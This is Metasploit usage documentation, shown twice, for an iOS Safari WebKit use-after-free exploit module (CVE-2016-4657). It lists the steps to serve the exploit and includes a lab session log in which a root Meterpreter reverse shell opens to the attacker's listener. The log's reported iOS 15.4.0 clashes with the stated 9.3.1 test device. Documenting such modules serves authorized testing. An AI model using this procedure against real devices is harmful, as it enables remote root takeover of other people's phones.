documentation/modules/exploit/apple_ios/browser/webkit_trident.md

## Description

This module exploits a UAF vulnerability in WebKit's JavaScriptCore library, CVE-2016-4657.

## Vulnerable Application

The exploit should work on 32-bit or 64-bit devices running iOS 9.3.4 or earlier, though it has been tested so far on 64-bit devices running 9.3.1.

## Verification Steps

 * Start msfconsole
 * `use exploit/apple_ios/browser/webkit_trident`
 * `set LHOST` and `SRVHOST` as appropriate
 * exploit
 * Browse to the given URL with a vulnerable device from Safari
 * Note that the payload is specially created for this exploit, due to sandbox
   limitations that prevent spawning new processes.

## Scenarios

### 64bit (ME279NF/A) running iOS 9.3.1:

```
msf exploit(apple_ios/browser/webkit_trident) >
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Sent exploit (770048 bytes)
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[+] 192.168.0.101    webkit_trident - Target is vulnerable.
[*] Meterpreter session 1 opened (192.168.0.110:4444 -> 192.168.0.101:52467) at 2018-05-30 14:49:59 +0200

msf exploit(apple_ios/browser/webkit_trident) > sessions -l

Active sessions
===============

  Id  Name  Type                           Information                                   Connection
  --  ----  ----                           -----------                                   ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.0.101  192.168.0.110:4444 -> 192.168.0.101:52467 (192.168.0.101)

msf exploit(apple_ios/browser/webkit_trident) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.101
OS           : iPad4,4 (iOS 15.4.0)
Architecture : arm64
BuildTuple   : aarch64-iphone-darwin
Meterpreter  : aarch64/apple_ios
```
add documentation 2018-06-02 21:51:24 -05:00			`## Description`

			`This module exploits a UAF vulnerability in WebKit's JavaScriptCore library, CVE-2016-4657.`

			`## Vulnerable Application`

			`The exploit should work on 32-bit or 64-bit devices running iOS 9.3.4 or earlier, though it has been tested so far on 64-bit devices running 9.3.1.`

			`## Verification Steps`

			`* Start msfconsole`
			* `use exploit/apple_ios/browser/webkit_trident`
			* `set LHOST` and `SRVHOST` as appropriate
			`* exploit`
			`* Browse to the given URL with a vulnerable device from Safari`
			`* Note that the payload is specially created for this exploit, due to sandbox`
			`limitations that prevent spawning new processes.`

			`## Scenarios`

			`### 64bit (ME279NF/A) running iOS 9.3.1:`

			```
			`msf exploit(apple_ios/browser/webkit_trident) >`
			`[*] 192.168.0.101 webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1`
			`[*] 192.168.0.101 webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1`
			`[*] 192.168.0.101 webkit_trident - Sent exploit (770048 bytes)`
			`[*] 192.168.0.101 webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1`
			`[+] 192.168.0.101 webkit_trident - Target is vulnerable.`
			`[*] Meterpreter session 1 opened (192.168.0.110:4444 -> 192.168.0.101:52467) at 2018-05-30 14:49:59 +0200`

			`msf exploit(apple_ios/browser/webkit_trident) > sessions -l`

			`Active sessions`
			`===============`

			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`1 meterpreter aarch64/apple_ios uid=0, gid=0, euid=0, egid=0 @ 192.168.0.101 192.168.0.110:4444 -> 192.168.0.101:52467 (192.168.0.101)`

			`msf exploit(apple_ios/browser/webkit_trident) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 192.168.0.101`
			`OS : iPad4,4 (iOS 15.4.0)`
			`Architecture : arm64`
			`BuildTuple : aarch64-iphone-darwin`
			`Meterpreter : aarch64/apple_ios`
			```